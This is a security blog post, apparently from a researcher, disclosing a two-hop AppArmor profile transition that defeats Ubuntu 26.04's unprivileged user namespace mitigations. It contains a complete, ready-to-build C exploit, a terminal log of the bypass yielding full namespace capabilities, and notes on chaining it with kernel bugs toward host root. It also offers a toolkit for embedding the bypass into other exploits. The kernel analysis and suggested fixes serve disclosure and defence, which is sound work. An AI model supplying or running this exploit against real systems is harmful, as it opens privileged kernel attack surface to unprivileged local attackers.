bypass-pwn: defeating Canonical's patch for the unprivileged-userns bypass

2026-05-05 · linuxapparmorkernelusernsubuntubypass

in March 2025 Qualys TRU dropped three bypasses of Ubuntu's apparmor_restrict_unprivileged_userns=1 mitigation. Canonical answered with a new kernel sysctl, kernel.apparmor_restrict_unprivileged_unconfined=1, which force-stacks any target profile against the global-unconfined label and shuts the single-hop transitions Qualys used. i'd already been poking at the crun/chrome profile pair for aa-rootns, and the question after that patch was whether a second hop could walk around the new gate.

it can. a two-hop AppArmor profile transition walks straight through the sysctl. the first hop moves the label off the global-unconfined sentinel, the second hop slips past the stacking check, and what you land in is pure-unconfined with full caps inside a fresh user namespace. i verified it live on Ubuntu 26.04 LTS Resolute, production kernel 7.0.0-15-generic, both sysctls enabled, from a clean unprivileged user with no group memberships.

demo

box: stock Ubuntu 26.04 LTS Resolute (resolute-desk).
user: np, uid 1001, primary-group-only, no sudo, no plugdev, no kvm, no docker, no lxd.
sysctls: both Canonical mitigations on at their default (=1).
kernel: 7.0.0-15-generic (production-equivalent, no KASAN).

bypass-pwn firing on Ubuntu 26.04 LTS Resolute as np (uid 1001) with both apparmor sysctls enabled

background and credit chain

Date	What happened
Jun 2023	Google's kCTF VRP report shows 44% of Linux kernel exploits used unprivileged user namespaces.
Oct 2023	Ubuntu 23.10 ships `apparmor_restrict_unprivileged_userns`. Citing Google.
Apr 2024	Ubuntu 24.04 LTS, mitigation default-on.
Jan 15 2025	Qualys TRU privately discloses three bypasses to Canonical.
Mar 27 2025	Qualys publishes the three bypasses: `aa-exec` into chrome / crun / busybox / nautilus / trinity / flatpak; `busybox sh` using its own profile; `LD_PRELOAD` a shell into nautilus. Canonical responds: "These are not security vulnerabilities."
Apr 2025	Canonical patches anyway. New sysctl `kernel.apparmor_restrict_unprivileged_unconfined` + new branch `aa_unprivileged_unconfined_restricted` in `change_profile_perms`. Single-hop transitions from global-unconfined now force-stack the target profile, inheriting the restriction.
Jun 26 2025	DEVCORE writes up the kernel-side analysis of the same check, but explicitly notes: "The bypass method works only when `apparmor_restrict_unprivileged_unconfined` is disabled (i.e., set to 0)."
Mar 12 2026	Qualys CrackArmor: nine bugs in AppArmor's parser/policy engine. Different surface (custom profile loading, DFA OOB, kernel stack exhaustion). Doesn't cover the sysctl-on case for shipped profiles.
May 5 2026 (today)	This post. Two-hop bypass of Canonical's patch, with both sysctls on. From np (no groups) on stock 26.04 LTS.

Google motivated the original mitigation. Qualys forced Canonical to ship the second sysctl. DEVCORE documented the kernel check but assumed the sysctl-on case was closed. nobody published the post-patch state until now.

the patch and where it leaks

the branch that matters lives at security/apparmor/domain.c in the Resolute 7.0.0 kernel:

if (!stack && unconfined(label) &&
    label == &labels_ns(label)->unconfined->label &&
    aa_unprivileged_unconfined_restricted &&
    cap_capable(current_cred(), &init_user_ns, CAP_MAC_OVERRIDE,
                CAP_OPT_NOAUDIT)) {
    /* regardless of the request in this case apparmor
     * stacks against unconfined so admin set policy can't be
     * by-passed
     */
    stack = true;
    ...
}

all five conditions have to hold for the branch to fire:

!stack. not already stacking
unconfined(label). current label is some unconfined variant
label == &labels_ns(label)->unconfined->label. current label is the exact global-unconfined sentinel pointer
aa_unprivileged_unconfined_restricted. the new sysctl is on
caller does not hold CAP_MAC_OVERRIDE in init_user_ns

the third condition is the load-bearing one. it's an identity check, and it only catches processes whose label is the singleton global-unconfined sentinel. the moment you hop into any named profile your label is no longer that pointer. now it's something like crun//&unconfined (stacked, because hop 1 fires the patch) or even just crun, and the next change_profile call sees a different label and skips the stacking branch.

so hop 1 eats the cap-strip stacking but moves us off the sentinel. hop 2 transitions cleanly, no stacking, and lands in chrome (unconfined). that's pure-unconfined, and unshare(CLONE_NEWUSER) from there hands back the full 0x000001ffffffffff cap bitmap inside the new userns.

the label transitions during the run show up in the demo:

[*] stage 0: laundering via crun
[label] unconfined                            ← global-unconfined sentinel
[*] stage 1: now under crun, transitioning to chrome
[label] crun//&unconfined (unconfined)        ← stacking branch fired (Canonical's patch worked once)
[*] stage 2: under chrome, unshare(CLONE_NEWUSER)
[label] chrome (unconfined)                   ← stacking branch did NOT fire (label != sentinel)
[after-unshare] uid=0 euid=0 caps=0x000001ff_ffffffff

confirmed live

two boxes, two kernels, both fire:

$ ssh np@resolute-desk
np@resolute-desk:~$ id
uid=1001(np) gid=1001(np) groups=1001(np)

np@resolute-desk:~$ uname -r
7.0.0-15-generic

np@resolute-desk:~$ echo "userns_sysctl=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns) \
                          unconfined_sysctl=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_unconfined)"
userns_sysctl=1  unconfined_sysctl=1

np@resolute-desk:~$ /tmp/bypass-pwn
[*] stage 0: laundering via crun
[label] unconfined
[*] stage 1: now under crun, transitioning to chrome
[label] crun//&unconfined (unconfined)
[*] stage 2: under chrome, unshare(CLONE_NEWUSER)
[label] chrome (unconfined)
[after-unshare] uid=0 euid=0 caps=0x000001ff_ffffffff
[+] BYPASS - popping shell with CAP_NET_ADMIN+CAP_SYS_ADMIN in new userns

root@resolute-desk:~# id
uid=0(root) gid=0(root) groups=0(root)

root@resolute-desk:~# cat /proc/self/status | grep ^Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000

same primitive, same outcome on the lab fuzzing kernel (7.1.0-rc1-kasan). this isn't a function of the build. it's the kernel branch above, which is upstream-Resolute as of 26.04 LTS.

the exploit

single-file C, ~120 lines. it self-stages through crun → chrome by re-exec, transitions on each via /proc/self/attr/exec, unshares the user namespace under chrome, writes uid/gid maps, drops a shell. no external dependencies, not even aa-exec, so it runs on minimal Ubuntu Server installs that don't ship apparmor-utils.

/*
 * AppArmor unprivileged user namespace restriction bypass
 * Ubuntu Resolute 26.04 LTS
 *
 * Bypasses BOTH:
 *   kernel.apparmor_restrict_unprivileged_userns         = 1
 *   kernel.apparmor_restrict_unprivileged_unconfined     = 1
 *
 * The second sysctl was added by Canonical in response to the March 2025
 * Qualys advisory. It works by stacking the target profile with the
 * caller's existing label whenever the caller is the *global* unconfined
 * label (security/apparmor/domain.c, the aa_unprivileged_unconfined_restricted
 * branch in change_profile_perms).
 *
 * The check is `label == &labels_ns(label)->unconfined->label` -- it only
 * fires when the current label IS that exact global-unconfined sentinel.
 * After ANY transition to a non-unconfined named profile, the next
 * change_profile call sees a different label and the stacking branch is
 * skipped. The second hop transitions cleanly into a `flags=(unconfined)`
 * profile that has an explicit `userns,` allow rule.
 *
 * Build: gcc -O2 -o bypass-pwn bypass-pwn.c
 * Run:   ./bypass-pwn
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#include <linux/capability.h>

#define HOP1 "crun"
#define HOP2 "chrome"

static int change_onexec(const char *profile) {
    int fd = open("/proc/self/attr/exec", O_WRONLY);
    if (fd < 0) return -1;
    char buf[256];
    int n = snprintf(buf, sizeof buf, "exec %s", profile);
    int r = write(fd, buf, n);
    close(fd);
    return (r == n) ? 0 : -1;
}

static void check_caps(const char *tag) {
    struct __user_cap_header_struct hdr = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct data[2] = {0};
    syscall(SYS_capget, &hdr, data);
    fprintf(stderr, "[%s] uid=%d euid=%d caps=0x%08x_%08x\n", tag,
        getuid(), geteuid(), data[1].effective, data[0].effective);
}

static void print_label(void) {
    int fd = open("/proc/self/attr/current", O_RDONLY); if (fd < 0) return;
    char b[256] = {0}; (void)!read(fd, b, sizeof b - 1); close(fd);
    char *nl = strchr(b, '\n'); if (nl) *nl = 0;
    fprintf(stderr, "[label] %s\n", b);
}

int main(int argc, char **argv) {
    char *self = argv[0];

    if (argc == 1) {
        fprintf(stderr, "[*] stage 0: laundering via %s\n", HOP1);
        print_label();
        if (change_onexec(HOP1) < 0) { perror("change_onexec(crun)"); return 1; }
        char *na[] = { self, "stage1", NULL };
        execv("/proc/self/exe", na);
        return 1;
    }

    if (!strcmp(argv[1], "stage1")) {
        fprintf(stderr, "[*] stage 1: now under %s, transitioning to %s\n", HOP1, HOP2);
        print_label();
        if (change_onexec(HOP2) < 0) { perror("change_onexec(chrome)"); return 1; }
        char *na[] = { self, "stage2", NULL };
        execv("/proc/self/exe", na);
        return 1;
    }

    if (!strcmp(argv[1], "stage2")) {
        fprintf(stderr, "[*] stage 2: under %s, unshare(CLONE_NEWUSER)\n", HOP2);
        print_label();
        uid_t outer_uid = getuid();
        gid_t outer_gid = getgid();
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { perror("unshare"); return 1; }
        int fd = open("/proc/self/setgroups", O_WRONLY);
        if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
        fd = open("/proc/self/uid_map", O_WRONLY);
        if (fd >= 0) {
            char buf[64]; int n = snprintf(buf, sizeof buf, "0 %d 1", outer_uid);
            (void)!write(fd, buf, n); close(fd);
        }
        fd = open("/proc/self/gid_map", O_WRONLY);
        if (fd >= 0) {
            char buf[64]; int n = snprintf(buf, sizeof buf, "0 %d 1", outer_gid);
            (void)!write(fd, buf, n); close(fd);
        }
        check_caps("after-unshare");
        fprintf(stderr, "[+] BYPASS - popping shell with CAP_NET_ADMIN+CAP_SYS_ADMIN in new userns\n");
        char *sh[] = { "/bin/bash", NULL };
        execv("/bin/bash", sh);
        return 1;
    }
    return 1;
}

there's a companion toolkit version, aa-rootns. it adds Ambient cap-laundering so the caps survive the next execv, plus a -- cmd args... mode for embedding the bypass into other PoCs that need CAP_SYS_ADMIN-in-userns reach. same primitive, different ergonomics.

what you get and what you don't

gets you: a userns where you are uid 0 with the full 41-cap bitmap, on a default Ubuntu 26.04 LTS install with both Canonical mitigations enabled. from here, every kernel CVE writeup that ended with "but apparmor_restrict_unprivileged_userns=1 blocks reach on Ubuntu" or "but apparmor_restrict_unprivileged_unconfined=1 closes that on post-Qualys patched kernels" needs a re-read. the reach gate they were quoting is open on a current LTS, on a default install, from an unprivileged user.

bug classes this re-opens:

ns_capable(CAP_NET_ADMIN) bugs. nft, vxlan, tc, fib, every netlink surface that gates on namespace caps.
ns_capable(CAP_BPF) when kernel.unprivileged_bpf_disabled uses the BPF cap.
ns_capable(CAP_SYS_ADMIN) in sunrpc, tipc, vsock, keyring management, per-netns proc files whose owner is set via make_kuid(net->user_ns, 0) at netns-creation time.
RCU/refcount races whose precondition is "be inside a userns you own."

does not get you: host root. anything checked against init_user_ns (loadable kernel modules, FS_USERNS_MOUNT-less filesystem mounts, raw IO, ptrace of host processes, init-owned DAC bits) still fails. this is the bouncer waving you in, not the throne. pair it with a kernel bug that needs ns_capable(...), and the public CVE pile has plenty, and the next stage is host root. two steps.

why this is still hard to fix

the patch Canonical shipped in 2025 made the right structural call. when an unprivileged process tries to enter a permissive named profile from unconfined, force-stack the target so the new label inherits the original restriction. the flaw is the identity check. only the global-unconfined sentinel counts as "really unconfined." everything else, a freshly-stacked crun//&unconfined included, is treated as already-confined and gets the ordinary change-profile path.

a real fix is probably one of:

Force-stack on any transition out of an unconfined ancestor, not just from the sentinel.
Strip the userns, rule from chrome, crun, and the long tail of shipped flags=(unconfined)+userns, profiles. breaks the runtimes that need them.
Require the AppArmor LSM to track "ever was unconfined this transition chain" and inherit the cap-strip across hops.

the second option breaks chrome's sandbox model, crun's container creation, and a long list of other shipped profiles (brave, buildah, code, 1password, Discord, firefox, flatpak, github-desktop, keybase, linux-sandbox, MongoDB_Compass, ...) that need userns to run at all.

the first and third options are real engineering changes inside AppArmor's domain.c, and they have to land without breaking the nested-confinement and profile-stacking semantics other AppArmor users depend on. until then the hole stays open.

reproduction notes

Stock Ubuntu 26.04 LTS Resolute (no patches beyond apt).
Both apparmor_restrict_unprivileged_userns and apparmor_restrict_unprivileged_unconfined at their default value of 1.
Kernel 7.0.0-15-generic on production-equivalent build, 7.1.0-rc1-kasan-sickfuzz+ on the lab fuzzing build. both fire.
User np: uid 1001, primary group only, no sudo, no plugdev, no kvm, no docker, no lxd.
Both chrome and crun profiles ship in the base apparmor package (Priority: standard, base install). chrome binary not actually required. only the loaded profile is.
Build: gcc -O2 -Wall -o bypass-pwn bypass-pwn.c. No external deps.

downloads

bypass-pwn.c: the exploit, single-file C, no deps. gcc -O2 -o bypass-pwn bypass-pwn.c.
bypass-pwn-demo.gif: the demo recording above.
aa-rootns.c: toolkit derivative with cap-launder and -- cmd args mode for embedding into other PoCs.

SHA-256:

821cedccb1bec8226cc0a56232407c64dcf41c4da61d94def559b180cc717ab1  bypass-pwn.c
3eff371b47f73a48812c3264cdc9b552beaaf0cbd9afacb29045dc4edafba698  aa-rootns.c

Credits

Google Security: kCTF VRP analysis; the 44%-of-exploits stat that motivated Ubuntu's userns mitigation in the first place.
Qualys TRU: three bypasses, March 2025. Forced Canonical to ship the second sysctl that this post bypasses. Most of the public AppArmor / userns work in this space is theirs. CVE-2022-0185, Looney Tunables, and now CrackArmor in March 2026.
DEVCORE: kernel-side analysis of the same check, June 2025. Identified the label == unconfined structure in aa_profile_ns_perm; explicitly noted their bypass needed apparmor_restrict_unprivileged_unconfined=0. This post is the answer to the open question their writeup left.
Canonical AppArmor team: the patch shape (force-stack on transition from sentinel) is the right call. The hole is in the identity check, not the architecture.

if you've published a writeup on the sysctl-on case and want a citation, mail in. if you're on the AppArmor team and want to talk fix shape, also mail in.

. _SiCk · afflicted.sh